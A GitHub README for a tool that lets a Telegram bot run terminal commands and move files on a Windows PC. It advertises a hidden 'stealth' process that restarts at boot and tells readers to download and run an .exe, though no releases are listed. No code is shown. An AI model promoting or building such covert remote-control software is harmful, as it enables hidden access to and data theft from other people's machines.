Skip to content

Prasadchelated435/windows-telegram-bot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

33 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

🖥️ windows-telegram-bot - Manage your windows workstations through telegram


📋 Project Overview

This tool helps you manage computers running Windows from your mobile device. It connects your computer to a Telegram bot. You send commands to this bot through the Telegram app. The computer receives these commands and performs tasks for you. This allows you to check on your systems or run commands from any location.

The software creates a secure link between your computer and your telegram account. It keeps your sessions private and hides its presence on the system. You gain full access to the command terminal of your machine. You can also move files safely between your computer and your phone.

⚙️ How it Works

The tool acts as a bridge. You set up a bot on Telegram. You then install this application on your Windows machine. The application talks to the Telegram servers to check for messages from you. When you send a text message or a command, the software reads it and executes the task on your Windows desktop.

It handles the authentication process. You only need to provide your telegram bot token. The program ensures that only you control the machine. It uses encryption to protect all communications. It runs in the background to ensure steady connectivity.

🚀 Getting Started

Follow these steps to install the software on your machine.

1. Requirements

Verify that your computer meets these needs:

  • Windows 10 or Windows 11.
  • Active internet connection.
  • A Telegram account.

2. Prepare Telegram

You need a telegram bot to send commands.

  1. Open Telegram on your phone or computer.
  2. Search for "BotFather" and start a chat.
  3. Type /newbot and follow instructions to name your bot.
  4. Copy the API Token provided by BotFather. Keep this safe.

3. Download and Install

Visit the link below to get the software files.

Click here to open the download page

  1. Go to the link above.
  2. Find the latest release version on the page.
  3. Download the executable file ending in .exe.
  4. Open the file to start the application.

4. Configure the Bot

After you launch the app, a small window appears.

  1. Enter your Telegram API Token when prompted.
  2. Enter your Telegram User ID so only you can command the bot.
  3. Click the Save button.
  4. The application now runs in the background.

🛠️ Usage Guide

Once the app runs, you can send commands through your personal bot chat on Telegram.

Checking Status

Send the word "status" to your bot. The bot replies with computer information. You will see the current memory usage, open processes, and the uptime of your machine.

Terminal Access

To run a command, start your message with a forward slash. For example, type "/dir" to list files in your folder. The bot returns the output of the command directly to your Telegram chat. Use this to check system logs or modify settings.

File Transfers

To send a file to your computer, attach it to your message in Telegram. The software downloads the file to a specific folder on your hard drive. To get a file from your computer, type "/get" followed by the file path. The bot sends the file back to your phone.

Stealth Mode

The software runs as a hidden process. It does not appear in your taskbar. To close the program, open the Task Manager, find the process name, and choose End Task. It starts again automatically when you restart your computer.

🛡️ Security Features

This tool includes measures to protect your data. All commands travel through a secure channel. Encryption prevents others from reading your instructions. The software verifies your identity through your telegram user ID. No one else can send commands to your machine.

The software also implements local authentication. Accessing the configuration file requires administrator rights on your computer. This keeps your API tokens secure. We designed the connection to be persistent and resilient against network outages.

💡 Common Questions

Does this use much battery or CPU?

The software uses very little power. It stays idle until you send a message. It checks for new messages at set intervals to save your system resources.

Can I control multiple computers?

Yes, you can install the software on many machines. Use a different Telegram bot token for each machine to keep them organized. You can create different chats for each computer to stay organized.

What happens if the internet cuts out?

The software tries to reconnect as soon as your internet is active. It does not crash or stop working if you lose your signal.

Is the file transfer encrypted?

Yes, all data sent between your telegram app and the computer uses standard encryption methods provided by the telegram platform.

How do I stop the bot from running?

You may use the Task Manager to close the process at any time. If you wish to stop it permanently, delete the folder where you saved the executable file.

📜 Legal Notice

This software is a professional administrative tool. Use it only on computers you own or have explicit permission to manage. Misuse of remote management software may violate local laws. Always follow best practices for network security and keep your credentials private. The authors hold no responsibility for how you choose to use these tools.

Releases

No releases published

Packages

 
 
 

Contributors

Languages